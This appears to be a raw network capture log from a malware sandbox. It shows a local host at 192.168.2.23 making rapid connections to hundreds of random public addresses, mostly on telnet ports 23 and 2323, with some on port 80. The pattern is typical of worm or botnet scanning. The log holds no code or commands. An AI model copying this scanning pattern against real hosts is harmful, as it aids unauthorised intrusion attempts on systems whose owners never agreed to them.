                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.232.92.44.38
                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.23105.82.136.100
                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.23219.196.50.103
                                                              Nov 13, 2023 22:18:01.774620056 CET1138823192.168.2.23176.172.240.165
                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.2325.214.230.119
                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.2350.177.250.66
                                                              Nov 13, 2023 22:18:01.774621010 CET1138823192.168.2.23104.1.227.168
                                                              Nov 13, 2023 22:18:01.774643898 CET1138823192.168.2.23165.210.221.211
                                                              Nov 13, 2023 22:18:01.774643898 CET1138823192.168.2.2320.38.102.74
                                                              Nov 13, 2023 22:18:01.774645090 CET1138823192.168.2.2342.196.228.136
                                                              Nov 13, 2023 22:18:01.774646044 CET1138823192.168.2.23138.136.135.235
                                                              Nov 13, 2023 22:18:01.774648905 CET1138823192.168.2.23114.246.35.228
                                                              Nov 13, 2023 22:18:01.774648905 CET1138823192.168.2.23119.89.172.131
                                                              Nov 13, 2023 22:18:01.774656057 CET1138823192.168.2.23113.186.92.80
                                                              Nov 13, 2023 22:18:01.774656057 CET1138823192.168.2.23130.35.190.133
                                                              Nov 13, 2023 22:18:01.774658918 CET1138823192.168.2.23100.197.134.65
                                                              Nov 13, 2023 22:18:01.774658918 CET1138823192.168.2.23121.112.198.69
                                                              Nov 13, 2023 22:18:01.774661064 CET113882323192.168.2.23202.134.8.19
                                                              Nov 13, 2023 22:18:01.774661064 CET1138823192.168.2.23192.43.56.124
                                                              Nov 13, 2023 22:18:01.774667978 CET1138823192.168.2.23118.201.209.80
                                                              Nov 13, 2023 22:18:01.774674892 CET1138823192.168.2.23168.125.167.48
                                                              Nov 13, 2023 22:18:01.774676085 CET1138823192.168.2.23142.252.69.82
                                                              Nov 13, 2023 22:18:01.774677992 CET1138823192.168.2.23143.40.68.124
                                                              Nov 13, 2023 22:18:01.774677992 CET113882323192.168.2.2383.170.77.226
                                                              Nov 13, 2023 22:18:01.774677992 CET1138823192.168.2.2324.170.21.42
                                                              Nov 13, 2023 22:18:01.774677992 CET1138823192.168.2.23146.163.119.198
                                                              Nov 13, 2023 22:18:01.774678946 CET1138823192.168.2.23122.99.116.108
                                                              Nov 13, 2023 22:18:01.774678946 CET113882323192.168.2.2339.139.82.183
                                                              Nov 13, 2023 22:18:01.774679899 CET1138823192.168.2.23195.72.146.52
                                                              Nov 13, 2023 22:18:01.774678946 CET1138823192.168.2.23203.161.196.238
                                                              Nov 13, 2023 22:18:01.774679899 CET1138823192.168.2.23220.33.56.187
                                                              Nov 13, 2023 22:18:01.774682045 CET1138823192.168.2.2371.224.73.210
                                                              Nov 13, 2023 22:18:01.774679899 CET1138823192.168.2.23223.11.40.93
                                                              Nov 13, 2023 22:18:01.774682045 CET1138823192.168.2.23189.182.228.35
                                                              Nov 13, 2023 22:18:01.774684906 CET1138823192.168.2.23100.6.52.191
                                                              Nov 13, 2023 22:18:01.774679899 CET113882323192.168.2.2323.83.206.200
                                                              Nov 13, 2023 22:18:01.774686098 CET1138823192.168.2.23197.74.234.135
                                                              Nov 13, 2023 22:18:01.774699926 CET1138823192.168.2.2362.148.236.151
                                                              Nov 13, 2023 22:18:01.774703026 CET1138823192.168.2.23153.71.87.106
                                                              Nov 13, 2023 22:18:01.774703979 CET1138823192.168.2.23101.78.226.169
                                                              Nov 13, 2023 22:18:01.774703979 CET1138823192.168.2.23154.50.135.149
                                                              Nov 13, 2023 22:18:01.774708033 CET1138823192.168.2.23179.186.60.24
                                                              Nov 13, 2023 22:18:01.774708033 CET1138823192.168.2.23124.17.75.168
                                                              Nov 13, 2023 22:18:01.774708033 CET113882323192.168.2.2314.113.8.132
                                                              Nov 13, 2023 22:18:01.774712086 CET1138823192.168.2.23212.233.172.143
                                                              Nov 13, 2023 22:18:01.774713993 CET1138823192.168.2.2313.42.145.1
                                                              Nov 13, 2023 22:18:01.774719954 CET1138823192.168.2.23208.115.102.62
                                                              Nov 13, 2023 22:18:01.774725914 CET1138823192.168.2.23197.121.5.253
                                                              Nov 13, 2023 22:18:01.774725914 CET1138823192.168.2.23181.210.36.13
                                                              Nov 13, 2023 22:18:01.774728060 CET1138823192.168.2.23181.228.170.50
                                                              Nov 13, 2023 22:18:01.774729013 CET1138823192.168.2.23181.86.158.30
                                                              Nov 13, 2023 22:18:01.774733067 CET1138823192.168.2.2371.181.142.174
                                                              Nov 13, 2023 22:18:01.774734974 CET1138823192.168.2.23206.2.130.64
                                                              Nov 13, 2023 22:18:01.774735928 CET1138823192.168.2.2312.123.0.85
                                                              Nov 13, 2023 22:18:01.774735928 CET1138823192.168.2.23184.48.120.34
                                                              Nov 13, 2023 22:18:01.774764061 CET1138823192.168.2.23221.47.36.255
                                                              Nov 13, 2023 22:18:01.774765968 CET1138823192.168.2.235.165.53.174
                                                              Nov 13, 2023 22:18:01.774766922 CET1138823192.168.2.23162.131.202.48
                                                              Nov 13, 2023 22:18:01.774765968 CET113882323192.168.2.23167.60.88.224
                                                              Nov 13, 2023 22:18:01.774769068 CET1138823192.168.2.2393.249.108.27
                                                              Nov 13, 2023 22:18:01.774769068 CET1138823192.168.2.2399.211.60.169
                                                              Nov 13, 2023 22:18:01.774769068 CET1138823192.168.2.2335.156.140.18
                                                              Nov 13, 2023 22:18:01.774770975 CET113882323192.168.2.2374.134.40.189
                                                              Nov 13, 2023 22:18:01.774770975 CET1138823192.168.2.2314.104.254.236
                                                              Nov 13, 2023 22:18:01.774775982 CET1138823192.168.2.23188.164.132.236
                                                              Nov 13, 2023 22:18:01.774775982 CET1138823192.168.2.23197.40.185.0
                                                              Nov 13, 2023 22:18:01.774781942 CET1138823192.168.2.2372.164.203.158
                                                              Nov 13, 2023 22:18:01.774787903 CET1138823192.168.2.2390.192.115.180
                                                              Nov 13, 2023 22:18:01.774791002 CET1138823192.168.2.23143.96.60.185
                                                              Nov 13, 2023 22:18:01.774832010 CET1138823192.168.2.23186.246.162.55
                                                              Nov 13, 2023 22:18:01.774848938 CET1138823192.168.2.23153.178.89.120
                                                              Nov 13, 2023 22:18:01.774848938 CET1138823192.168.2.23179.46.53.93
                                                              Nov 13, 2023 22:18:01.774848938 CET1138823192.168.2.23197.195.142.137
                                                              Nov 13, 2023 22:18:01.774849892 CET113882323192.168.2.2319.251.233.232
                                                              Nov 13, 2023 22:18:01.774852037 CET1138823192.168.2.2352.62.80.152
                                                              Nov 13, 2023 22:18:01.774852037 CET1138823192.168.2.23123.166.55.11
                                                              Nov 13, 2023 22:18:01.774853945 CET1138823192.168.2.23136.119.86.247
                                                              Nov 13, 2023 22:18:01.774853945 CET1138823192.168.2.23208.126.195.187
                                                              Nov 13, 2023 22:18:01.774863005 CET1138823192.168.2.2396.94.117.179
                                                              Nov 13, 2023 22:18:01.774872065 CET1138823192.168.2.2364.109.150.177
                                                              Nov 13, 2023 22:18:01.774872065 CET1138823192.168.2.2373.193.109.227
                                                              Nov 13, 2023 22:18:01.774873018 CET1138823192.168.2.2345.210.45.198
                                                              Nov 13, 2023 22:18:01.774873018 CET1138823192.168.2.2391.241.233.160
                                                              Nov 13, 2023 22:18:01.774878025 CET1138823192.168.2.23101.76.33.139
                                                              Nov 13, 2023 22:18:01.774880886 CET1138823192.168.2.23199.199.129.127
                                                              Nov 13, 2023 22:18:01.774898052 CET1138823192.168.2.23110.148.244.152
                                                              Nov 13, 2023 22:18:01.774903059 CET113882323192.168.2.2376.131.108.204
                                                              Nov 13, 2023 22:18:01.774903059 CET1138823192.168.2.231.74.37.6
                                                              Nov 13, 2023 22:18:01.774904966 CET1138823192.168.2.2377.137.231.73
                                                              Nov 13, 2023 22:18:01.774904966 CET1138823192.168.2.23189.96.30.65
                                                              Nov 13, 2023 22:18:01.774904966 CET1138823192.168.2.23153.87.56.217
                                                              Nov 13, 2023 22:18:01.774914026 CET1138823192.168.2.2366.51.162.40
                                                              Nov 13, 2023 22:18:01.774914026 CET1138823192.168.2.23191.67.108.245
                                                              Nov 13, 2023 22:18:01.774914980 CET1138823192.168.2.23100.3.125.205
                                                              Nov 13, 2023 22:18:01.774940968 CET113882323192.168.2.23123.24.184.62
                                                              Nov 13, 2023 22:18:01.774944067 CET1138823192.168.2.2363.191.16.159
                                                              Nov 13, 2023 22:18:01.774949074 CET1138823192.168.2.23139.188.249.17
                                                              Nov 13, 2023 22:18:01.774949074 CET1138823192.168.2.2365.1.124.144
                                                              Nov 13, 2023 22:18:01.774949074 CET113882323192.168.2.2393.216.155.104
                                                              Nov 13, 2023 22:18:01.774959087 CET1138823192.168.2.23120.5.103.168
                                                              Nov 13, 2023 22:18:01.774959087 CET1138823192.168.2.2372.194.8.101
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.23210.51.217.144
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.2367.56.61.206
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.2376.57.204.5
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.2360.237.247.209
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.2374.96.83.41
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.23153.209.115.198
                                                              Nov 13, 2023 22:18:01.774960995 CET1138823192.168.2.2360.79.128.165
                                                              Nov 13, 2023 22:18:01.774972916 CET1138823192.168.2.2324.100.11.56
                                                              Nov 13, 2023 22:18:01.774975061 CET1138823192.168.2.23156.1.8.28
                                                              Nov 13, 2023 22:18:01.774972916 CET1138823192.168.2.23106.174.43.201
                                                              Nov 13, 2023 22:18:01.774976015 CET1138823192.168.2.23145.176.24.53
                                                              Nov 13, 2023 22:18:01.774976969 CET1138823192.168.2.23188.17.45.34
                                                              Nov 13, 2023 22:18:01.774976015 CET1138823192.168.2.2388.253.97.62
                                                              Nov 13, 2023 22:18:01.774976969 CET1138823192.168.2.23163.191.105.146
                                                              Nov 13, 2023 22:18:01.774976015 CET1138823192.168.2.23121.10.61.191
                                                              Nov 13, 2023 22:18:01.774987936 CET1138823192.168.2.234.203.66.192
                                                              Nov 13, 2023 22:18:01.774996042 CET113882323192.168.2.2345.108.101.126
                                                              Nov 13, 2023 22:18:01.775002003 CET1138823192.168.2.23182.85.18.90
                                                              Nov 13, 2023 22:18:01.775011063 CET1138823192.168.2.2395.187.77.207
                                                              Nov 13, 2023 22:18:01.775015116 CET1138823192.168.2.2358.213.222.104
                                                              Nov 13, 2023 22:18:01.775017023 CET1138823192.168.2.2339.57.3.12
                                                              Nov 13, 2023 22:18:01.775038004 CET1138823192.168.2.2319.135.12.2
                                                              Nov 13, 2023 22:18:01.775038004 CET113882323192.168.2.23104.34.41.118
                                                              Nov 13, 2023 22:18:01.775038004 CET1138823192.168.2.23168.52.13.156
                                                              Nov 13, 2023 22:18:01.775041103 CET1138823192.168.2.2376.70.130.99
                                                              Nov 13, 2023 22:18:01.775038958 CET1138823192.168.2.23217.13.99.183
                                                              Nov 13, 2023 22:18:01.775038958 CET1138823192.168.2.2319.84.236.121
                                                              Nov 13, 2023 22:18:01.775038958 CET1138823192.168.2.2314.240.105.131
                                                              Nov 13, 2023 22:18:01.775075912 CET1138823192.168.2.23122.22.61.241
                                                              Nov 13, 2023 22:18:01.775075912 CET1138823192.168.2.2389.125.249.131
                                                              Nov 13, 2023 22:18:01.775075912 CET1138823192.168.2.23163.154.221.43
                                                              Nov 13, 2023 22:18:01.775077105 CET1138823192.168.2.2358.82.217.94
                                                              Nov 13, 2023 22:18:01.775075912 CET113882323192.168.2.2375.0.68.81
                                                              Nov 13, 2023 22:18:01.775078058 CET1138823192.168.2.23118.150.97.82
                                                              Nov 13, 2023 22:18:01.775078058 CET1138823192.168.2.23166.172.138.125
                                                              Nov 13, 2023 22:18:01.775079966 CET1138823192.168.2.23219.132.12.135
                                                              Nov 13, 2023 22:18:01.775079966 CET1138823192.168.2.23165.135.50.123
                                                              Nov 13, 2023 22:18:01.775079966 CET1138823192.168.2.23170.166.114.64
                                                              Nov 13, 2023 22:18:01.775084019 CET1138823192.168.2.23132.184.172.117
                                                              Nov 13, 2023 22:18:01.775088072 CET1138823192.168.2.2334.237.48.165
                                                              Nov 13, 2023 22:18:01.775089025 CET1138823192.168.2.23166.93.86.145
                                                              Nov 13, 2023 22:18:01.775089025 CET1138823192.168.2.2374.173.188.18
                                                              Nov 13, 2023 22:18:01.775093079 CET1138823192.168.2.23112.87.79.114
                                                              Nov 13, 2023 22:18:01.775103092 CET1138823192.168.2.2359.112.209.173
                                                              Nov 13, 2023 22:18:01.775103092 CET1138823192.168.2.23134.245.1.88
                                                              Nov 13, 2023 22:18:01.775108099 CET1138823192.168.2.2370.10.246.245
                                                              Nov 13, 2023 22:18:01.775109053 CET1138823192.168.2.2331.104.226.170
                                                              Nov 13, 2023 22:18:01.775109053 CET113882323192.168.2.23112.134.67.82
                                                              Nov 13, 2023 22:18:01.775109053 CET1138823192.168.2.23142.119.131.68
                                                              Nov 13, 2023 22:18:01.775120020 CET1138823192.168.2.23136.215.36.193
                                                              Nov 13, 2023 22:18:01.775130987 CET1138823192.168.2.23110.167.157.141
                                                              Nov 13, 2023 22:18:01.775132895 CET1138823192.168.2.2354.63.55.9
                                                              Nov 13, 2023 22:18:01.775132895 CET1138823192.168.2.23120.60.82.107
                                                              Nov 13, 2023 22:18:01.775140047 CET1138823192.168.2.23112.255.164.64
                                                              Nov 13, 2023 22:18:01.775158882 CET1138823192.168.2.23166.100.255.180
                                                              Nov 13, 2023 22:18:01.775158882 CET1138823192.168.2.2393.119.217.119
                                                              Nov 13, 2023 22:18:01.775162935 CET113882323192.168.2.23140.100.35.132
                                                              Nov 13, 2023 22:18:01.775180101 CET1138823192.168.2.23211.185.35.136
                                                              Nov 13, 2023 22:18:01.775180101 CET1138823192.168.2.2348.215.16.215
                                                              Nov 13, 2023 22:18:01.775262117 CET1138823192.168.2.2366.38.135.134
                                                              Nov 13, 2023 22:18:01.775264978 CET1138823192.168.2.2359.232.83.190
                                                              Nov 13, 2023 22:18:01.775265932 CET1138823192.168.2.23151.146.162.237
                                                              Nov 13, 2023 22:18:01.775265932 CET1138823192.168.2.23102.121.81.14
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.2358.134.140.189
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.23222.179.101.253
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.23144.26.212.113
                                                              Nov 13, 2023 22:18:01.775268078 CET1138823192.168.2.23179.108.153.110
                                                              Nov 13, 2023 22:18:01.775266886 CET113882323192.168.2.2344.118.251.234
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.234.203.114.78
                                                              Nov 13, 2023 22:18:01.775268078 CET1138823192.168.2.23146.223.64.242
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.2344.171.71.168
                                                              Nov 13, 2023 22:18:01.775268078 CET1138823192.168.2.2380.111.168.154
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.23199.130.69.209
                                                              Nov 13, 2023 22:18:01.775268078 CET1138823192.168.2.23146.170.48.206
                                                              Nov 13, 2023 22:18:01.775266886 CET1138823192.168.2.23217.134.40.170
                                                              Nov 13, 2023 22:18:01.775268078 CET1138823192.168.2.2383.148.1.215
                                                              Nov 13, 2023 22:18:01.775280952 CET1138823192.168.2.23151.217.16.54
                                                              Nov 13, 2023 22:18:01.775281906 CET1138823192.168.2.2336.166.121.241
                                                              Nov 13, 2023 22:18:01.775283098 CET1138823192.168.2.23176.81.167.174
                                                              Nov 13, 2023 22:18:01.775284052 CET1138823192.168.2.2368.255.148.86
                                                              Nov 13, 2023 22:18:01.775300026 CET1138823192.168.2.2376.117.80.182
                                                              Nov 13, 2023 22:18:01.775309086 CET1138823192.168.2.23201.182.78.201
                                                              Nov 13, 2023 22:18:01.775309086 CET1138823192.168.2.23203.242.235.91
                                                              Nov 13, 2023 22:18:01.775316954 CET1138823192.168.2.2320.253.212.75
                                                              Nov 13, 2023 22:18:01.775317907 CET1138823192.168.2.2371.17.215.36
                                                              Nov 13, 2023 22:18:01.775317907 CET1138823192.168.2.23143.192.104.204
                                                              Nov 13, 2023 22:18:01.775321007 CET1138823192.168.2.2339.23.230.107
                                                              Nov 13, 2023 22:18:01.775317907 CET1138823192.168.2.2313.37.223.165
                                                              Nov 13, 2023 22:18:01.775322914 CET1138823192.168.2.23165.114.87.87
                                                              Nov 13, 2023 22:18:01.775322914 CET113882323192.168.2.231.156.156.239
                                                              Nov 13, 2023 22:18:01.775322914 CET113882323192.168.2.23108.211.9.230
                                                              Nov 13, 2023 22:18:01.775322914 CET1138823192.168.2.23113.88.10.101
                                                              Nov 13, 2023 22:18:01.775322914 CET1138823192.168.2.23114.23.24.189
                                                              Nov 13, 2023 22:18:01.775331020 CET1138823192.168.2.23200.118.151.177
                                                              Nov 13, 2023 22:18:01.775340080 CET113882323192.168.2.23108.43.112.7
                                                              Nov 13, 2023 22:18:01.775342941 CET1138823192.168.2.2387.194.152.104
                                                              Nov 13, 2023 22:18:01.775362968 CET1138823192.168.2.2391.78.56.16
                                                              Nov 13, 2023 22:18:01.775362968 CET1138823192.168.2.23137.200.211.125
                                                              Nov 13, 2023 22:18:01.775366068 CET1138823192.168.2.23148.59.83.131
                                                              Nov 13, 2023 22:18:01.775382996 CET1138823192.168.2.2334.121.255.197
                                                              Nov 13, 2023 22:18:01.775392056 CET1138823192.168.2.23107.58.160.107
                                                              Nov 13, 2023 22:18:01.775393009 CET1138823192.168.2.23212.12.9.40
                                                              Nov 13, 2023 22:18:01.775392056 CET1138823192.168.2.23146.213.21.217
                                                              Nov 13, 2023 22:18:01.775403023 CET1138823192.168.2.2317.213.206.165
                                                              Nov 13, 2023 22:18:01.775448084 CET1138823192.168.2.2335.185.129.25
                                                              Nov 13, 2023 22:18:01.775449038 CET1138823192.168.2.23143.49.75.7
                                                              Nov 13, 2023 22:18:01.775449038 CET1138823192.168.2.23143.186.101.25
                                                              Nov 13, 2023 22:18:01.775449991 CET113882323192.168.2.23105.121.125.187
                                                              Nov 13, 2023 22:18:01.775449991 CET1138823192.168.2.2339.96.186.99
                                                              Nov 13, 2023 22:18:01.775458097 CET1138823192.168.2.23149.73.223.244
                                                              Nov 13, 2023 22:18:01.775458097 CET1138823192.168.2.2367.51.87.4
                                                              Nov 13, 2023 22:18:01.775458097 CET1138823192.168.2.2390.166.126.115
                                                              Nov 13, 2023 22:18:01.775465012 CET1138823192.168.2.23126.178.159.150
                                                              Nov 13, 2023 22:18:01.775465012 CET113882323192.168.2.23181.216.187.249
                                                              Nov 13, 2023 22:18:01.775473118 CET1138823192.168.2.2336.245.12.195
                                                              Nov 13, 2023 22:18:01.775474072 CET1138823192.168.2.2365.184.236.235
                                                              Nov 13, 2023 22:18:01.775477886 CET1138823192.168.2.23154.110.178.198
                                                              Nov 13, 2023 22:18:01.775479078 CET1138823192.168.2.2390.181.81.225
                                                              Nov 13, 2023 22:18:01.775486946 CET1138823192.168.2.23179.86.121.240
                                                              Nov 13, 2023 22:18:01.775486946 CET1138823192.168.2.23220.57.27.63
                                                              Nov 13, 2023 22:18:01.775505066 CET1138823192.168.2.2369.182.7.239
                                                              Nov 13, 2023 22:18:01.775505066 CET1138823192.168.2.2345.109.75.171
                                                              Nov 13, 2023 22:18:01.775506020 CET1138823192.168.2.2312.89.109.101
                                                              Nov 13, 2023 22:18:01.775556087 CET1138823192.168.2.23171.113.128.72
                                                              Nov 13, 2023 22:18:01.775567055 CET1138823192.168.2.23177.118.156.206
                                                              Nov 13, 2023 22:18:01.775568008 CET113882323192.168.2.2348.3.98.158
                                                              Nov 13, 2023 22:18:01.775568008 CET1138823192.168.2.23166.146.113.76
                                                              Nov 13, 2023 22:18:01.775568008 CET113882323192.168.2.2390.80.126.5
                                                              Nov 13, 2023 22:18:01.775573015 CET1138823192.168.2.23115.240.240.160
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.23194.148.53.138
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.2312.100.229.129
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.2395.236.186.199
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.2363.207.34.218
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.235.125.215.232
                                                              Nov 13, 2023 22:18:01.775579929 CET1138823192.168.2.2371.147.115.62
                                                              Nov 13, 2023 22:18:01.775579929 CET1138823192.168.2.2334.184.207.36
                                                              Nov 13, 2023 22:18:01.775579929 CET1138823192.168.2.2380.110.140.197
                                                              Nov 13, 2023 22:18:01.775583029 CET1138823192.168.2.2397.9.14.154
                                                              Nov 13, 2023 22:18:01.775583029 CET1138823192.168.2.2345.97.19.68
                                                              Nov 13, 2023 22:18:01.775583982 CET1138823192.168.2.2349.133.200.30
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.2392.227.225.122
                                                              Nov 13, 2023 22:18:01.775573969 CET1138823192.168.2.2342.170.220.5
                                                              Nov 13, 2023 22:18:01.775588036 CET1138823192.168.2.2348.11.118.250
                                                              Nov 13, 2023 22:18:01.775619030 CET1138823192.168.2.23182.254.117.96
                                                              Nov 13, 2023 22:18:01.775619030 CET113882323192.168.2.23150.127.157.169
                                                              Nov 13, 2023 22:18:01.775619030 CET1138823192.168.2.23144.87.238.125
                                                              Nov 13, 2023 22:18:01.775619030 CET1138823192.168.2.2387.23.229.97
                                                              Nov 13, 2023 22:18:01.775650978 CET1138823192.168.2.23193.7.107.1
                                                              Nov 13, 2023 22:18:01.775650978 CET1138823192.168.2.2312.30.38.172
                                                              Nov 13, 2023 22:18:01.775652885 CET1138823192.168.2.2337.203.162.176
                                                              Nov 13, 2023 22:18:01.775654078 CET1138823192.168.2.2339.11.235.79
                                                              Nov 13, 2023 22:18:01.775654078 CET1138823192.168.2.23218.92.79.82
                                                              Nov 13, 2023 22:18:01.775654078 CET1138823192.168.2.23195.44.184.58
                                                              Nov 13, 2023 22:18:01.775660038 CET1138823192.168.2.23103.135.2.158
                                                              Nov 13, 2023 22:18:01.775660038 CET113882323192.168.2.23133.171.102.155
                                                              Nov 13, 2023 22:18:01.775661945 CET1138823192.168.2.23124.208.217.140
                                                              Nov 13, 2023 22:18:01.775661945 CET1138823192.168.2.235.125.49.194
                                                              Nov 13, 2023 22:18:01.775676012 CET1138823192.168.2.23209.38.25.52
                                                              Nov 13, 2023 22:18:01.775676966 CET1138823192.168.2.23175.218.164.212
                                                              Nov 13, 2023 22:18:01.775679111 CET1138823192.168.2.2376.198.159.223
                                                              Nov 13, 2023 22:18:01.775679111 CET1138823192.168.2.2312.180.194.94
                                                              Nov 13, 2023 22:18:01.775679111 CET1138823192.168.2.23219.69.110.243
                                                              Nov 13, 2023 22:18:01.775682926 CET1138823192.168.2.23167.205.194.195
                                                              Nov 13, 2023 22:18:01.775687933 CET1138823192.168.2.23194.77.124.185
                                                              Nov 13, 2023 22:18:01.775711060 CET113882323192.168.2.23143.211.242.208
                                                              Nov 13, 2023 22:18:01.775711060 CET1138823192.168.2.23126.169.236.30
                                                              Nov 13, 2023 22:18:01.775712013 CET1138823192.168.2.2361.212.225.98
                                                              Nov 13, 2023 22:18:01.775719881 CET1138823192.168.2.2384.57.56.50
                                                              Nov 13, 2023 22:18:01.775721073 CET1138823192.168.2.2324.65.197.46
                                                              Nov 13, 2023 22:18:01.775732994 CET1138823192.168.2.23190.129.46.74
                                                              Nov 13, 2023 22:18:01.775732994 CET1138823192.168.2.23107.181.184.136
                                                              Nov 13, 2023 22:18:01.775734901 CET1138823192.168.2.23118.191.6.181
                                                              Nov 13, 2023 22:18:01.775742054 CET1138823192.168.2.23184.74.71.217
                                                              Nov 13, 2023 22:18:01.775743961 CET1138823192.168.2.23112.236.191.146
                                                              Nov 13, 2023 22:18:01.775746107 CET1138823192.168.2.2373.132.129.74
                                                              Nov 13, 2023 22:18:01.775754929 CET1138823192.168.2.23115.176.206.62
                                                              Nov 13, 2023 22:18:01.775757074 CET1138823192.168.2.2327.35.130.144
                                                              Nov 13, 2023 22:18:01.775758982 CET113882323192.168.2.2386.232.100.7
                                                              Nov 13, 2023 22:18:01.775758982 CET1138823192.168.2.2386.91.153.45
                                                              Nov 13, 2023 22:18:01.775763988 CET1138823192.168.2.2337.108.32.150
                                                              Nov 13, 2023 22:18:01.775763988 CET1138823192.168.2.23120.153.27.66
                                                              Nov 13, 2023 22:18:01.775767088 CET1138823192.168.2.23167.127.17.73
                                                              Nov 13, 2023 22:18:01.775770903 CET1138823192.168.2.23132.210.161.240
                                                              Nov 13, 2023 22:18:01.775773048 CET1138823192.168.2.2391.132.153.68
                                                              Nov 13, 2023 22:18:01.775773048 CET1138823192.168.2.2339.2.147.148
                                                              Nov 13, 2023 22:18:01.775774002 CET1138823192.168.2.23194.230.136.194
                                                              Nov 13, 2023 22:18:01.775774956 CET113882323192.168.2.23107.126.48.170
                                                              Nov 13, 2023 22:18:01.775790930 CET1138823192.168.2.23194.85.161.71
                                                              Nov 13, 2023 22:18:01.775790930 CET1138823192.168.2.23218.104.232.43
                                                              Nov 13, 2023 22:18:01.775790930 CET1138823192.168.2.2389.159.249.200
                                                              Nov 13, 2023 22:18:01.775794029 CET1138823192.168.2.2325.18.21.94
                                                              Nov 13, 2023 22:18:01.775793076 CET1138823192.168.2.2317.102.15.71
                                                              Nov 13, 2023 22:18:01.775794983 CET1138823192.168.2.23113.174.56.85
                                                              Nov 13, 2023 22:18:01.775794983 CET1138823192.168.2.23211.182.63.151
                                                              Nov 13, 2023 22:18:01.775794983 CET1138823192.168.2.23134.140.148.1
                                                              Nov 13, 2023 22:18:01.775804996 CET113882323192.168.2.23198.11.204.238
                                                              Nov 13, 2023 22:18:01.775805950 CET1138823192.168.2.2323.100.17.149
                                                              Nov 13, 2023 22:18:01.775806904 CET1138823192.168.2.23124.250.193.147
                                                              Nov 13, 2023 22:18:01.775806904 CET1138823192.168.2.23151.175.67.182
                                                              Nov 13, 2023 22:18:01.775811911 CET1138823192.168.2.23199.173.163.30
                                                              Nov 13, 2023 22:18:01.775823116 CET1138823192.168.2.2382.39.10.72
                                                              Nov 13, 2023 22:18:01.775823116 CET113882323192.168.2.2398.155.254.185
                                                              Nov 13, 2023 22:18:01.775827885 CET1138823192.168.2.23156.117.169.164
                                                              Nov 13, 2023 22:18:01.775827885 CET1138823192.168.2.23161.232.144.174
                                                              Nov 13, 2023 22:18:01.775827885 CET1138823192.168.2.23101.236.74.223
                                                              Nov 13, 2023 22:18:01.775834084 CET1138823192.168.2.23155.161.187.129
                                                              Nov 13, 2023 22:18:01.775834084 CET1138823192.168.2.23101.90.10.180
                                                              Nov 13, 2023 22:18:01.775835991 CET1138823192.168.2.23169.92.123.34
                                                              Nov 13, 2023 22:18:01.775847912 CET1138823192.168.2.2347.62.149.42
                                                              Nov 13, 2023 22:18:01.775852919 CET1138823192.168.2.2336.152.197.51
                                                              Nov 13, 2023 22:18:01.775856972 CET1138823192.168.2.2314.130.117.40
                                                              Nov 13, 2023 22:18:01.775865078 CET1138823192.168.2.23186.161.15.90
                                                              Nov 13, 2023 22:18:01.775888920 CET1138823192.168.2.23136.60.43.98
                                                              Nov 13, 2023 22:18:01.775892019 CET1138823192.168.2.2317.45.156.234
                                                              Nov 13, 2023 22:18:01.775892019 CET113882323192.168.2.234.11.42.52
                                                              Nov 13, 2023 22:18:01.775896072 CET1138823192.168.2.232.247.80.56
                                                              Nov 13, 2023 22:18:01.775897980 CET1138823192.168.2.23154.70.170.166
                                                              Nov 13, 2023 22:18:01.775907993 CET1138823192.168.2.23216.81.26.87
                                                              Nov 13, 2023 22:18:01.783232927 CET80806073062.121.130.167192.168.2.23
                                                              Nov 13, 2023 22:18:01.841959953 CET8034206112.125.190.166192.168.2.23
                                                              Nov 13, 2023 22:18:01.842154980 CET8034206112.125.190.166192.168.2.23
                                                              Nov 13, 2023 22:18:01.842297077 CET3420680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.843594074 CET8034226112.125.190.166192.168.2.23
                                                              Nov 13, 2023 22:18:01.843652964 CET3422680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.843713999 CET3422680192.168.2.23112.125.190.166
                                                              Nov 13, 2023 22:18:01.843866110 CET1343680192.168.2.23112.107.206.49
                                                              Nov 13, 2023 22:18:01.843867064 CET1343680192.168.2.23112.76.182.164
                                                              Nov 13, 2023 22:18:01.843868971 CET1343680192.168.2.23112.91.91.166
                                                              Nov 13, 2023 22:18:01.843873978 CET1343680192.168.2.23112.57.10.113
                                                              Nov 13, 2023 22:18:01.843894005 CET1343680192.168.2.23112.224.244.180
                                                              Nov 13, 2023 22:18:01.843904018 CET1343680192.168.2.23112.210.12.18
                                                              Nov 13, 2023 22:18:01.843904018 CET1343680192.168.2.23112.185.90.38
                                                              Nov 13, 2023 22:18:01.843925953 CET1343680192.168.2.23112.95.71.3
                                                              Nov 13, 2023 22:18:01.843971968 CET1343680192.168.2.23112.93.180.18
                                                              Nov 13, 2023 22:18:01.844000101 CET1343680192.168.2.23112.251.218.255
                                                              Nov 13, 2023 22:18:01.844021082 CET1343680192.168.2.23112.219.178.157
                                                              Nov 13, 2023 22:18:01.844024897 CET1343680192.168.2.23112.228.233.8
                                                              Nov 13, 2023 22:18:01.844034910 CET1343680192.168.2.23112.26.174.103
                                                              Nov 13, 2023 22:18:01.844053030 CET1343680192.168.2.23112.125.173.154
                                                              Nov 13, 2023 22:18:01.844075918 CET1343680192.168.2.23112.89.120.206
